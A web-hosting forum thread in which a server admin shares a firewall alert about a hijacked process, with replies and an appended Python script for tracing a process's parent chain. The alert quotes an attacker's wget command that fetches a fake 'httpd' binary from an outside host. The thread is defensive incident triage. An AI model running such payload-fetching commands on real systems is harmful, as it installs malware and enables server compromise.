The Community Forums


faked httpd

Discussion in 'General Discussion' started by colorcloud, Nov 11, 2008.

  1. colorcloud

    colorcloud Active Member

    Joined:
    Aug 14, 2003
    Messages:
    28
    Likes Received:
    0
    Trophy Points:
    1
    I just get CSF's email with the following messages:

    Code:
    PID:     30735
    Account: nobody
    Uptime:  81 seconds
    
    Executable:
    
    /usr/bin/wget
    
    
    Command Line (often faked in exploits):
    
    wget http://www.bigbizz.net/httpd
    
    
    Network connections by the process (if any):
    
    tcp6: 0.0.0.0:80 -> 0.0.0.0:0
    tcp6: 0.0.0.0:443 -> 0.0.0.0:0
    tcp6: 61.63.20.135:80 -> 60.50.63.43:59056
    Anyone know what the purpose of this fake httpd is?
    I can't see which account executed the wget command; how can I find it?
     
  2. neutro

    neutro Well-Known Member

    Joined:
    Apr 11, 2004
    Messages:
    70
    Likes Received:
    0
    Trophy Points:
    6
    Use WHM > Check current running processes, or ps auxwf in SSH.

    chmod your wget binary to 700
     
  3. chirpy

    chirpy Well-Known Member

    Joined:
    Jun 15, 2002
    Messages:
    13,475
    Likes Received:
    20
    Trophy Points:
    38
    Location:
    Go on, have a guess
    It's an exploit. You would have to look in WHM > Apache Status when you see that running, as you're not running with suPHP compiled into Apache/PHP, which would show you the username.
     
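An added example, not posted by anyone in this thread, of what the `ps auxwf` and Apache Status advice above is getting at: walk the suspicious PID's ancestry through Linux /proc to print the parent chain, the account each process runs as, and its working directory, which for a command spawned from a PHP script often still points at the account's document root even when mod_php makes everything show up as nobody. It assumes a Linux /proc layout; the lookup is injectable so the walk can also be run against a recorded process table.

```python
import os, pwd, sys

def read_proc(pid):
    """Read one process from Linux /proc; None if it has already exited."""
    base = f"/proc/{pid}"
    try:
        fields = {}
        with open(f"{base}/status") as fh:
            for line in fh:
                key, _, value = line.partition(":")
                fields[key] = value.strip()
        with open(f"{base}/cmdline", "rb") as fh:
            cmd = fh.read().replace(b"\0", b" ").decode(errors="replace").strip()
    except OSError:
        return None
    try:
        cwd = os.readlink(f"{base}/cwd")
    except OSError:
        cwd = "?"  # another uid's process (need root) or already gone
    uid = int(fields["Uid"].split()[0])  # first column is the real uid
    try:
        user = pwd.getpwuid(uid).pw_name
    except KeyError:
        user = str(uid)
    return {"pid": int(pid), "ppid": int(fields["PPid"]), "user": user,
            "cmd": cmd or f"[{fields.get('Name', '?')}]", "cwd": cwd}

def ancestry(pid, lookup=read_proc):
    """Chain from `pid` up to PID 1, child first, as a list of dicts.
    `lookup` defaults to live /proc; pass a dict's .get to replay a snapshot."""
    chain, seen = [], set()
    while pid and pid not in seen:  # PPid 0 ends the walk; `seen` guards loops
        seen.add(pid)
        proc = lookup(pid)
        if proc is None:
            break  # parent exited between reads; report what we have
        chain.append(proc)
        pid = proc["ppid"]
    return chain

def format_chain(chain):
    """Render root-first and indented, the way `ps auxwf` draws the tree."""
    lines = []
    for depth, p in enumerate(reversed(chain)):
        lines.append(f"{'  ' * depth}{p['pid']:>6} {p['user']:<8} cwd={p['cwd']}  {p['cmd']}")
    return "\n".join(lines)

if __name__ == "__main__":  # usage: python3 proc_chain.py <pid>  (placeholder name)
    target = int(sys.argv[1]) if len(sys.argv) > 1 else os.getpid()
    print(format_chain(ancestry(target)))
```

Run it as root while the process is still alive, since /proc/<pid>/cwd of a nobody-owned process is not readable otherwise and the entry vanishes once wget exits.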